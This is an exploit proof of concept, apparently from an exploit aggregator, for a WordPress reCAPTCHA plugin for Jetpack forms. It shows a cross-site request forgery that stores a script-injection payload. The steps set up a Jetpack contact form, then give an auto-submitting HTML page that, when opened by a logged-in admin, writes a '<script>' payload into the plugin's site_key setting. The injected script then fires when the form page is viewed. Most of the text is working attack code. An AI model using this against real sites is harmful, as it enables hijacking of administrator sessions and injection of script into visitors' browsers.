## https://sploitus.com/exploit?id=WPEX-ID:6E09E922-983C-4406-8053-747D839995D1
This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.
Add a post/page containing a Jetpack Contact Form shortcode:
```
[contact-form][contact-field label="Name" type="name" required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]
```
Once there is a form using Jetpack, make a logged in admin open an HTML document containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=recaptcha-jetpack" method="post">
<input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
<input type="hidden" name="secret_key" value='csrf2222' />
<input type="hidden" name="recaptcha_type" value="v2" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" name="enter" id="enter" value="Submit">
</form>
</body>
```
View the post/page containing the form and see the XSS